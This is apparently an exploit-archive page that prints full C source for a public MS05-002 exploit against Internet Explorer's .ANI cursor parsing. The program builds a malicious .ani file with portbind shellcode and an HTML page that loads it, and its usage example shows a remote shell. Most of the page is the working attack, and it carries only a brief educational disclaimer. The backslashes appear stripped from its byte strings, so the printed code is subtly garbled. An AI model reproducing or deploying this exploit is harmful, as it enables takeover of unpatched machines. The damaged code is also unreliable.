‘Microsoft Internet Explorer .ANI Files Handling Exploit (MS05-002)’

Summary

In January’s monthly security updates, Microsoft released a patch that fix a vulnerability in the handling of .ANI file format. More information can be found at: Windows ANI File Parsing Buffer Overflow (MS05-002). Below you can find a universal exploit code for this vulnerability.’

Credit:

‘The information has been provided by houseofdabus HOD.’


Details

Exploit:
/* HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2
*
* Copyright (c) 2004-2005 houseofdabus.
*
* (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
* (CAN-2004-1049)
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* (universal — for all affected systems)
* ———————————————————————
* Description:
* A remote code execution vulnerability exists in the way that
* cursor, animated cursor, and icon formats are handled. An attacker
* could try to exploit the vulnerability by constructing a malicious
* cursor or icon file that could potentially allow remote code
* execution if a user visited a malicious Web site or viewed a
* malicious e-mail message. An attacker who successfully exploited
* this vulnerability could take complete control of an affected
* system.
*
* ———————————————————————
* Patch:
* http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
*
* ———————————————————————
* Tested on:
* – Windows Server 2003
* – Windows XP SP1
* – Windows XP SP0
* – Windows 2000 SP4
* – Windows 2000 SP3
* – Windows 2000 SP2
*
* ———————————————————————
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Win32/cygwin: gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Linux : gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
*
* ———————————————————————
* Example:
*
* C:>HOD-ms05002-ani-expl.exe poc 7777
* <…>
* [*] Creating poc.ani file … Ok
* [*] Creating poc.html file … Ok
*
* C:>
*
* start IE -> C:poc.html
*
* C:>telnet localhost 7777
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:Documents and SettingsAdministratorDesktop>
*
* ———————————————————————
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so.
*
*/

#include <stdio.h>
#include <stdlib.h>

/* ANI header */
unsigned char aniheader[] =
‘x52x49x46x46x9cx18x00x00x41x43x4fx4ex61x6ex69x68’
‘x7cx03x00x00x24x00x00x00x08x00x00x00x08x00x00x00’
‘x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00’

/* jmp offset, no Jitsu */
‘x77x82x40x00xebx64x90x90x77x82x40x00xebx64x90x90’
‘xebx54x90x90x77x82x40x00xebx54x90x90x77x82x40x00’
‘xebx44x90x90x77x82x40x00xebx44x90x90x77x82x40x00’
‘xebx34x90x90x77x82x40x00xebx34x90x90x77x82x40x00’
‘xebx24x90x90x77x82x40x00xebx24x90x90x77x82x40x00’
‘xebx14x90x90x77x82x40x00xebx14x90x90x77x82x40x00’
‘x77x82x40x00x90x90x90x90x90x90x90x90x90x90x90x90’
‘x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90’
‘x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90’
‘x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90’
‘x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90’;

/* portbind shellcode */
unsigned char shellcode[] =
‘xebx70x56x33xc0x64x8bx40x30x85xc0x78x0cx8bx40x0c’
‘x8bx70x1cxadx8bx40x08xebx09x8bx40x34x8dx40x7cx8b’
‘x40x3cx5exc3x60x8bx6cx24x24x8bx45x3cx8bx54x05x78’
‘x03xd5x8bx4ax18x8bx5ax20x03xddxe3x34x49x8bx34x8b’
‘x03xf5x33xffx33xc0xfcxacx84xc0x74x07xc1xcfx0dx03’
‘xf8xebxf4x3bx7cx24x28x75xe1x8bx5ax24x03xddx66x8b’
‘x0cx4bx8bx5ax1cx03xddx8bx04x8bx03xc5x89x44x24x1c’
‘x61xc3xebx3dxadx50x52xe8xa8xffxffxffx89x07x83xc4’
‘x08x83xc7x04x3bxf1x75xecxc3x8ex4ex0execx72xfexb3’
‘x16x7exd8xe2x73xadxd9x05xcexd9x09xf5xadxa4x1ax70’
‘xc7xa4xadx2exe9xe5x49x86x49xcbxedxfcx3bxe7x79xc6’
‘x79x83xecx60x8bxecxebx02xebx05xe8xf9xffxffxffx5e’
‘xe8x3dxffxffxffx8bxd0x83xeex36x8dx7dx04x8bxcex83’
‘xc1x10xe8x9dxffxffxffx83xc1x18x33xc0x66xb8x33x32’
‘x50x68x77x73x32x5fx8bxdcx51x52x53xffx55x04x5ax59’
‘x8bxd0xe8x7dxffxffxffxb8x01x63x6dx64xc1xf8x08x50’
‘x89x65x34x33xc0x66xb8x90x01x2bxe0x54x83xc0x72x50’
‘xffx55x24x33xc0x50x50x50x50x40x50x40x50xffx55x14’
‘x8bxf0x33xc0x33xdbx50x50x50xb8x02x01x11x5cxfexcc’
‘x50x8bxc4xb3x10x53x50x56xffx55x18x53x56xffx55x1c’
‘x53x8bxd4x2bxe3x8bxccx52x51x56xffx55x20x8bxf0x33’
‘xc9xb1x54x2bxe1x8bxfcx57x33xc0xf3xaax5fxc6x07x44’
‘xfex47x2dx57x8bxc6x8dx7fx38xabxabxabx5fx33xc0x8d’
‘x77x44x56x57x50x50x50x40x50x48x50x50xffx75x34x50’
‘xffx55x08xf7xd0x50xffx36xffx55x10xffx77x38xffx55’
‘x28xffx55x0c’;

#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300)) = (port)

unsigned char discl[] = ‘This is provided as proof-of-concept code only for educational’
‘ purposes and testing by authorized individuals with permission’
‘ to do so.’;

unsigned char html[] =
‘<html>n’
‘(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit’
‘<br>Copyright (c) 2004-2005 .: houseofdabus :.<br><a href =”
‘http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx’>’
‘Patch (MS05-002)</a>n’
‘<script>alert(‘%s’)</script>n<head>nt<style>n’
‘tt* {CURSOR: url(‘%s.ani’)}nt</style>n</head>n’
‘</html>’;

unsigned short
fixx(unsigned short p)
{
unsigned short r = 0;
r = (p & 0xFF00) >> 8;
r |= (p & 0x00FF) << 8;

return r;
}

void
usage(char *prog)
{
printf(‘Usage:n’);
printf(‘%s <file> <bindport>nn’, prog);
exit(0);
}

int
main(int argc, char **argv)
{
FILE *fp;
unsigned short port;
unsigned char f[256+5] = ”;
unsigned char anib[912] = ”;

printf(‘n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploitnn’);
printf(‘tCopyright (c) 2004-2005 .: houseofdabus :.nnn’);
printf(‘Tested on all affected systems:n’);
printf(‘ [+] Windows Server 2003n [+] Windows XP SP1, SP0n’);
printf(‘ [+] Windows 2000 All SPnn’);

printf(‘%snn’, discl);
if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
printf(‘[-] Size of shellcode must be <= 686 bytesn’);
return 0;
}
if (argc < 3) usage(argv[0]);

if (strlen(argv[1]) > 256) {
printf(‘[-] Size of filename must be <=256 bytesn’);
return 0;
}

/* creating ani file */
strcpy(f, argv[1]);
strcat(f, ‘.ani’);
printf(‘[*] Creating %s file …’, f);
fp = fopen(f, ‘wb’);
if (fp == NULL) {
printf(‘n[-] error: can\’t create file: %sn’, f);
return 0;
}
memset(anib, 0x90, 912);

/* header */
memcpy(anib, aniheader, sizeof(aniheader)-1);
/* shellcode */
port = atoi(argv[2]);
SET_PORTBIND_PORT(shellcode, fixx(port));
memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1);

fwrite(anib, 1, 912, fp);
printf(‘ Okn’);
fclose(fp);

/* creating html file */
f[0] = ‘’;
strcpy(f, argv[1]);
strcat(f, ‘.html’);
printf(‘[*] Creating %s file …’, f);
fp = fopen(f, ‘wb’);
if (fp == NULL) {
printf(‘n[-] error: can\’t create file: %sn’, f);
return 0;
}
sprintf(anib, html, discl, argv[1]);
fwrite(anib, 1, strlen(anib), fp);
printf(‘ Okn’);
fclose(fp);

return 0;
}’

Categories: Exploits